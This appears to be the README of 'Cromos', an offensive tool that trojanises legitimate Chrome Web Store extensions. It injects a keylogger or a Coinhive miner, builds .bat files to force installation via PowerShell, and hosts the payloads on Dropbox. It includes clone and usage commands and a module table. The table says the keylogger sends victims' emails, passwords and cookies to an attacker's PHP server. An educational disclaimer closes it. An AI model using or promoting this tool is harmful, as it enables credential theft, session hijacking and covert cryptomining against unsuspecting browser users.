Cromos

Cromos is a tool for downloading legitimate extensions of the Chrome Web Store and inject codes in the background of the application and more cromos create executable files to force installation via PowerShell for example, and also upload files to dropbox to host the malicious files.

  • Download extension
  • Injections
  • Upload files on dropbox
  • Windows infection
[email protected]:~/Documents/Tools/Powershell# git clone https://github.com/fbctf/cromos.git
[email protected]:~/Documents/Tools/Powershell/cromos# python cromos.py -h

         (         )      *         )    (
   (     )\ )   ( /(    (  `     ( /(    )\ )
   )\   (()/(   )\())   )\))(    )\())  (()/(
 (((_)   /(_)) ((_)\   ((_)()\  ((_)\    /(_))
 )\___  (_))     ((_)  (_()((_)   ((_)  (_))
((/ __| | _ \   / _ \  |  \/  |  / _ \  / __|
 | (__  |   /  | (_) | | |\/| | | (_) | \__ \
  \___| |_|_\   \___/  |_|  |_|  \___/  |___/

      Version: 1.0 Builds: 1 Modules: 2

usage: python cromos.py --help

Cromos is a tool for downloading legitimate extensions of the Chrome Web Store
and inject codes in the background of the application and more cromos create
executable files to force installation via PowerShell for example, and also
upload files to dropbox to host the malicious files.

optional arguments:
  -h, --help            show this help message and exit
  --extension EXTENSION
                        Download a extension from Google Chrome Webstore
  --load LOAD           Load a script to run in background with the
                        application
  --build BUILD         Build types .bat
  --token TOKEN         Token for uploading files in Dropbox

 

Demo

This is a demonstration of the tool at work in this examples I’m downloading a famous Google extension called G Suite Training on Google Chrome Web Store and injecting a keylogger module.

Modules

You can also inject some predefined modules in the background as keyloggervirtual currency.

Module Description
modules/keylogger This module captures all the passwords you type in an infected browser over https or not. All you need is to have a php server for example to receive the requests get the parameters are email, password, cookies and userAgent.
modules/currency This module allows you to mine virtual coins using the coinhive API, you just need to have an account.

Disclaimer

Code samples are provided for educational purposes. Adequate defenses can only be built by researching attack techniques available to malicious actors. Using this code against target systems without prior permission is illegal in most jurisdictions. The authors are not liable for any damages from misuse of this information or code.

Contacts